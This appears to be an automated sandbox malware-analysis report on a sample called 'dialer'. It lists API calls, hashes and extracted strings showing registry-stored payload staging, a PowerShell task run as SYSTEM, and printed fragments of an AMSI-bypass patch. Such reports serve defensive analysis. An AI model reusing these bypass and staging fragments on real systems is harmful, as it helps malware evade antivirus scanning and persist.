303->302 304 7ff790dc1fe1 StrCatW 303->304 305 7ff790dc1f79 StrCatW StrCatW 303->305 304->300 304->303 305->306 306->304 310 7ff790dc1000 CryptAcquireContextW 307->310 311 7ff790dc1061 310->311 312 7ff790dc103f CryptGenRandom CryptReleaseContext 310->312 311->290 312->311

                                                                                                    Callgraph

                                                                                                    Executed Functions

                                                                                                    Function 00007FF790DC194C Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 92registryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FindResourceExA.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1964
                                                                                                    • SizeofResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC197B
                                                                                                    • LoadResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1990
                                                                                                    • LockResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19A2
                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19CC
                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19F6
                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1A25
                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1A4F
                                                                                                      • Part of subcall function 00007FF790DC1ADC: GetProcessHeap.KERNEL32 ref: 00007FF790DC1AF0
                                                                                                      • Part of subcall function 00007FF790DC1ADC: HeapAlloc.KERNEL32 ref: 00007FF790DC1B01
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCpyW.SHLWAPI ref: 00007FF790DC1B14
                                                                                                      • Part of subcall function 00007FF790DC1ADC: VerSetConditionMask.NTDLL ref: 00007FF790DC1B76
                                                                                                      • Part of subcall function 00007FF790DC1ADC: VerSetConditionMask.NTDLL ref: 00007FF790DC1B87
                                                                                                      • Part of subcall function 00007FF790DC1ADC: VerSetConditionMask.NTDLL ref: 00007FF790DC1B98
                                                                                                      • Part of subcall function 00007FF790DC1ADC: VerifyVersionInfoW.KERNEL32 ref: 00007FF790DC1BAB
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1BBF
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1BDA
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1BEA
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1BFA
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1C0A
                                                                                                      • Part of subcall function 00007FF790DC17A4: SysAllocString.OLEAUT32 ref: 00007FF790DC17C0
                                                                                                      • Part of subcall function 00007FF790DC17A4: SysAllocString.OLEAUT32 ref: 00007FF790DC17D0
                                                                                                      • Part of subcall function 00007FF790DC17A4: CoInitializeEx.COMBASE ref: 00007FF790DC17DD
                                                                                                      • Part of subcall function 00007FF790DC17A4: CoInitializeSecurity.COMBASE ref: 00007FF790DC1814
                                                                                                      • Part of subcall function 00007FF790DC17A4: CoCreateInstance.COMBASE ref: 00007FF790DC1859
                                                                                                      • Part of subcall function 00007FF790DC17A4: VariantInit.OLEAUT32 ref: 00007FF790DC186B
                                                                                                      • Part of subcall function 00007FF790DC17A4: CoUninitialize.COMBASE ref: 00007FF790DC1904
                                                                                                      • Part of subcall function 00007FF790DC17A4: SysFreeString.OLEAUT32 ref: 00007FF790DC190D
                                                                                                      • Part of subcall function 00007FF790DC17A4: SysFreeString.OLEAUT32 ref: 00007FF790DC1916
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC1184
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC1190
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC11A0
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC11AC
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC11BC
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC11CC
                                                                                                      • Part of subcall function 00007FF790DC1154: CoInitializeEx.COMBASE ref: 00007FF790DC11D9
                                                                                                      • Part of subcall function 00007FF790DC1154: CoInitializeSecurity.COMBASE ref: 00007FF790DC1210
                                                                                                      • Part of subcall function 00007FF790DC1154: CoCreateInstance.COMBASE ref: 00007FF790DC1252
                                                                                                      • Part of subcall function 00007FF790DC1154: VariantInit.OLEAUT32 ref: 00007FF790DC1264
                                                                                                      • Part of subcall function 00007FF790DC15CC: SysAllocString.OLEAUT32 ref: 00007FF790DC15E2
                                                                                                      • Part of subcall function 00007FF790DC15CC: SysAllocString.OLEAUT32 ref: 00007FF790DC15F2
                                                                                                      • Part of subcall function 00007FF790DC15CC: CoInitializeEx.OLE32 ref: 00007FF790DC15FF
                                                                                                      • Part of subcall function 00007FF790DC15CC: CoInitializeSecurity.COMBASE ref: 00007FF790DC1636
                                                                                                      • Part of subcall function 00007FF790DC15CC: CoCreateInstance.COMBASE ref: 00007FF790DC1676
                                                                                                      • Part of subcall function 00007FF790DC15CC: VariantInit.OLEAUT32 ref: 00007FF790DC1688
                                                                                                      • Part of subcall function 00007FF790DC15CC: VariantInit.OLEAUT32 ref: 00007FF790DC1718
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$Initialize$InitResourceVariant$ConditionCreateInstanceMaskSecurity$FreeHeapOpenValue$FindInfoLoadLockProcessSizeofUninitializeVerifyVersion
                                                                                                    • String ID: C:\Windows\SysWOW64\WindowsPowerShell\v1.0$EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                                                                    • API String ID: 1090849789-1656134131
                                                                                                    • Opcode ID: a945f6bfb5c0a11c5a6d1c3122d6ff3d9680862ac37ed9327692272a4eff5ead
                                                                                                    • Instruction ID: 51824c3fad0c3bc6020983e417b2c0853d9e82f43369ed50d0816ac767695c4e
                                                                                                    • Opcode Fuzzy Hash: a945f6bfb5c0a11c5a6d1c3122d6ff3d9680862ac37ed9327692272a4eff5ead
                                                                                                    • Instruction Fuzzy Hash: 4841BD29A2963241EE30BF31A8111B9E3A5BF49780FC82135D90E47794EE3CF509D7A0
                                                                                                    Function 00007FF790DC17A4 Relevance: 13.6, APIs: 9, Instructions: 103memorycomCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 4184240511-0
                                                                                                    • Opcode ID: a3b3855170ba43f7dd2c44b82ea8c5689a5c3093f9a56b22b548aa88aae08d85
                                                                                                    • Instruction ID: 2636428802aae6a29d5ebb2e08dc12009578a643401f78732bc42683ede59bc4
                                                                                                    • Opcode Fuzzy Hash: a3b3855170ba43f7dd2c44b82ea8c5689a5c3093f9a56b22b548aa88aae08d85
                                                                                                    • Instruction Fuzzy Hash: 4B419D36B14A9696E7209F39D4452ADB3B1FF89B88F446135EE4E43B24DF38E149D340
                                                                                                    Function 00007FF790DC1000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34encryptionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                    • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                                                    • API String ID: 1815803762-291530887
                                                                                                    • Opcode ID: ae5b0d10a8788360585257c4ad82d0f7a0762030508e0468c0f33aa88bdcd6dc
                                                                                                    • Instruction ID: f60785dc01f7e92edaafc62b41b08c64efeec52dd70e3814dc1a9ecc1d40977d
                                                                                                    • Opcode Fuzzy Hash: ae5b0d10a8788360585257c4ad82d0f7a0762030508e0468c0f33aa88bdcd6dc
                                                                                                    • Instruction Fuzzy Hash: 0D014B26B14B5086E7109F76E8441AAB7A0FBC8F80F898035CE5D43718CF78E446A750
                                                                                                    Function 00007FF790DC1ADC Relevance: 54.4, APIs: 12, Strings: 19, Instructions: 116memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ConditionMask$Heap$AllocInfoProcessVerifyVersion
                                                                                                    • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                                                    • API String ID: 2029100085-2228522184
                                                                                                    • Opcode ID: 27e785f148f77e327b5555b98a8ea3dd4624678508d9bfb0ab5c46e766a0de7d
                                                                                                    • Instruction ID: 64e943c8c426298d49c4baea827a589751936610531709dc29c1bb7673729400
                                                                                                    • Opcode Fuzzy Hash: 27e785f148f77e327b5555b98a8ea3dd4624678508d9bfb0ab5c46e766a0de7d
                                                                                                    • Instruction Fuzzy Hash: A351FD69A28BA390EA24FB35F8552E5A365AF46781FC47031D80E06365DF7CF109D7E0
                                                                                                    Function 00007FF790DC1DB8 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 203memorystringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree$lstrlen
                                                                                                    • String ID: '+'$'+[Char]($)+'$gfff$gfff
                                                                                                    • API String ID: 1876416331-3743437565
                                                                                                    • Opcode ID: 87fd0c68318a3f68055d8be463de6c46affc1a5547d336f3b281c1e5bd1d7d37
                                                                                                    • Instruction ID: 299eacd4616941ca57f7bffef4b66e9fc21ee385e7fe91a5f11cc3f73c849a47
                                                                                                    • Opcode Fuzzy Hash: 87fd0c68318a3f68055d8be463de6c46affc1a5547d336f3b281c1e5bd1d7d37
                                                                                                    • Instruction Fuzzy Hash: DD81F226B24A7285EB24EF76E8155B8A365FF45B88B846039DD0E43B64DF3CF409D350
                                                                                                    Function 00007FF790DC1154 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 277memorycomCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 66 7ff790dc1154-7ff790dc11e1 SysAllocString * 6 CoInitializeEx 67 7ff790dc1571-7ff790dc15c9 SysFreeString * 6 66->67 68 7ff790dc11e7-7ff790dc1221 CoInitializeSecurity 66->68 69 7ff790dc122f-7ff790dc125a CoCreateInstance 68->69 70 7ff790dc1223-7ff790dc1229 68->70 71 7ff790dc156b CoUninitialize 69->71 72 7ff790dc1260-7ff790dc12b9 VariantInit 69->72 70->69 70->71 71->67 74 7ff790dc1560-7ff790dc1565 72->74 75 7ff790dc12bf-7ff790dc12d7 72->75 74->71 75->74 77 7ff790dc12dd-7ff790dc12fa 75->77 79 7ff790dc1300-7ff790dc1317 77->79 80 7ff790dc1556-7ff790dc155a 77->80 82 7ff790dc1549-7ff790dc1550 79->82 83 7ff790dc131d-7ff790dc132f 79->83 80->74 82->80 85 7ff790dc153f-7ff790dc1543 83->85 86 7ff790dc1335-7ff790dc134e 83->86 85->82 86->85 88 7ff790dc1354-7ff790dc1370 86->88 90 7ff790dc1376-7ff790dc1391 88->90 91 7ff790dc1534-7ff790dc1539 88->91 93 7ff790dc1529-7ff790dc152e 90->93 94 7ff790dc1397-7ff790dc13b3 90->94 91->85 93->91 96 7ff790dc151f-7ff790dc1523 94->96 97 7ff790dc13b9-7ff790dc13d2 94->97 96->93 99 7ff790dc1514-7ff790dc1519 97->99 100 7ff790dc13d8-7ff790dc13f5 97->100 99->96 102 7ff790dc1509-7ff790dc150e 100->102 103 7ff790dc13fb-7ff790dc140b 100->103 102->99 105 7ff790dc1411-7ff790dc1421 103->105 106 7ff790dc14fe-7ff790dc1503 103->106 105->106 108 7ff790dc1427-7ff790dc1437 105->108 106->102 108->106 110 7ff790dc143d-7ff790dc14e0 VariantInit * 3 108->110 111 7ff790dc14eb-7ff790dc14ed 110->111 111->106 112 7ff790dc14ef-7ff790dc14f8 111->112 112->106
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                                                                    • String ID: SYSTEM$powershell
                                                                                                    • API String ID: 3960698109-2482694968
                                                                                                    • Opcode ID: acb5b600baeec5b07b312a6db0af3136a0ba7a913fa333411818defa5453bea8
                                                                                                    • Instruction ID: 5aa2e6a767ed1771da1e99b90f883ce6c000bb225bdf2d7fadb1e1edb198bef1
                                                                                                    • Opcode Fuzzy Hash: acb5b600baeec5b07b312a6db0af3136a0ba7a913fa333411818defa5453bea8
                                                                                                    • Instruction Fuzzy Hash: EDD13736B14BA686EB10DF7AE84419DB7B4FB84B88B405132DE4E47B28DF39E049C350
                                                                                                    Function 00007FF790DC15CC Relevance: 15.1, APIs: 10, Instructions: 121memorycomCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2407135876-0
                                                                                                    • Opcode ID: 95c8ef1e0f399922a78404bf503d733f13d0a57ba047e01ab0114964292ddd94
                                                                                                    • Instruction ID: 9601c36ac506440aec0706fa1daa84c964815a86d38a9c717f810216a4d9ad5c
                                                                                                    • Opcode Fuzzy Hash: 95c8ef1e0f399922a78404bf503d733f13d0a57ba047e01ab0114964292ddd94
                                                                                                    • Instruction Fuzzy Hash: 24518936B14A56CAE7209F79D4452EDB3B1FB89B88F445136EE0D42B28DF38E149D390
                                                                                                    Function 00007FF790DC1D04 Relevance: 2.5, APIs: 2, Instructions: 43stringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 173 7ff790dc1d04-7ff790dc1d35 lstrlenW call 7ff790dc1078 176 7ff790dc1da3-7ff790dc1db7 173->176 177 7ff790dc1d37 173->177 178 7ff790dc1d92-7ff790dc1da1 StrStrIW 177->178 178->176 179 7ff790dc1d39-7ff790dc1d4c 178->179 180 7ff790dc1d88-7ff790dc1d90 179->180 180->178 181 7ff790dc1d4e-7ff790dc1d84 180->181 181->180
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1659193697-0
                                                                                                    • Opcode ID: eada75f1b4e31a9ecaeea2633b12f8d73f9f7010800f93e817ee6859198f3569
                                                                                                    • Instruction ID: 5951ff80e3d801be4c7bd068c53dfd81a15410bd6830f6895306017e69e0a784
                                                                                                    • Opcode Fuzzy Hash: eada75f1b4e31a9ecaeea2633b12f8d73f9f7010800f93e817ee6859198f3569
                                                                                                    • Instruction Fuzzy Hash: 57115E36B18BE581DA749B21E4013EAA364FB88BC0F908031CE8D83B18DF3CE4559790
                                                                                                    Function 00007FF790DC1938 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 182 7ff790dc1938-7ff790dc1943 call 7ff790dc194c ExitProcess
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF790DC194C: FindResourceExA.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1964
                                                                                                      • Part of subcall function 00007FF790DC194C: SizeofResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC197B
                                                                                                      • Part of subcall function 00007FF790DC194C: LoadResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1990
                                                                                                      • Part of subcall function 00007FF790DC194C: LockResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19A2
                                                                                                      • Part of subcall function 00007FF790DC194C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19CC
                                                                                                      • Part of subcall function 00007FF790DC194C: RegSetValueExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19F6
                                                                                                      • Part of subcall function 00007FF790DC194C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1A25
                                                                                                      • Part of subcall function 00007FF790DC194C: RegSetValueExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1A4F
                                                                                                    • ExitProcess.KERNEL32 ref: 00007FF790DC1943
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$OpenValue$ExitFindLoadLockProcessSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 2173734010-0
                                                                                                    • Opcode ID: a3f1f17fb1266c7b44eff39a08c5575f002c78a398db9eb90bfca44689dbb104
                                                                                                    • Instruction ID: d48e43298e007483f90bc98f2263be5f289a106b9d0892ced7938701abb26365
                                                                                                    • Opcode Fuzzy Hash: a3f1f17fb1266c7b44eff39a08c5575f002c78a398db9eb90bfca44689dbb104
                                                                                                    • Instruction Fuzzy Hash: 47A0220AF3823282EB283BB0082B0BCA2202F80300F802030C00B02382CC3CF0002BB8

                                                                                                    Executed Functions

                                                                                                    Function 06812D78 Relevance: 16.8, Strings: 12, Instructions: 1810COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$84'l$84'l$tPp$tPp
                                                                                                    • API String ID: 0-2816616202
                                                                                                    • Opcode ID: 796b0a68a77eb3b5dae08629cd1655eae93382630d6b4d7b6e7935cc604d8f2d
                                                                                                    • Instruction ID: 5be10f27dfa3209c0b4f994840d16e40e391b55ba50dbd2b3abd7aaa492583e4
                                                                                                    • Opcode Fuzzy Hash: 796b0a68a77eb3b5dae08629cd1655eae93382630d6b4d7b6e7935cc604d8f2d
                                                                                                    • Instruction Fuzzy Hash: 6CE2B230B002089FDB54DB68C851BAEBBB6AF85314F14C06ADA15DF395DB72DD82CB91
                                                                                                    Function 068144F8 Relevance: 10.7, Strings: 8, Instructions: 697COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p
                                                                                                    • API String ID: 0-3630578132
                                                                                                    • Opcode ID: e83e5eabe0f95b914a2321e0e6572d4bed4c34f5bb7f4c392b866016f1b16d8e
                                                                                                    • Instruction ID: 20f01f5ac45085c4f2c5fd1fec8eac8aed7837c062aa3c2cfebd96b73cd565c8
                                                                                                    • Opcode Fuzzy Hash: e83e5eabe0f95b914a2321e0e6572d4bed4c34f5bb7f4c392b866016f1b16d8e
                                                                                                    • Instruction Fuzzy Hash: DB321471F002098FDB649B69D411B6EBBEAAFC5314F24847AD615DF350EB72C882CB91
                                                                                                    Function 05D116F8 Relevance: 8.9, Strings: 7, Instructions: 169COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84'l$84'l$tPp$tPp$$p$$p$$p
                                                                                                    • API String ID: 0-247343218
                                                                                                    • Opcode ID: f9e82ca489a50081fef970441066e82324994783a6ae52b11a46a01a8c4a4196
                                                                                                    • Instruction ID: 0ff68c5030361985da926c703f2b92040de783b0b968252a0743332d2ddf5560
                                                                                                    • Opcode Fuzzy Hash: f9e82ca489a50081fef970441066e82324994783a6ae52b11a46a01a8c4a4196
                                                                                                    • Instruction Fuzzy Hash: 5F512735704214ABC7249AA8A810B7ABBE6BFC4710F24C55FEA45EB381DE75CC41C7A6
                                                                                                    Function 05D1F490 Relevance: 5.6, Strings: 4, Instructions: 620COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$4'p$4'p
                                                                                                    • API String ID: 0-4019061985
                                                                                                    • Opcode ID: 5e7bd1108b54b3a94057b01f7fff714152ac90395739e427bd5b232363bbf9eb
                                                                                                    • Instruction ID: dafd00a98f790e0dc2942da2a04bec24c597a1f1b5dfcd124791d1329e7dd7ec
                                                                                                    • Opcode Fuzzy Hash: 5e7bd1108b54b3a94057b01f7fff714152ac90395739e427bd5b232363bbf9eb
                                                                                                    • Instruction Fuzzy Hash: 1C224671B04206AFCB10DB69A911B6ABBA3BFC1211F2480BBDD56DB351DB35C881C7B5
                                                                                                    Function 05D1DDA3 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
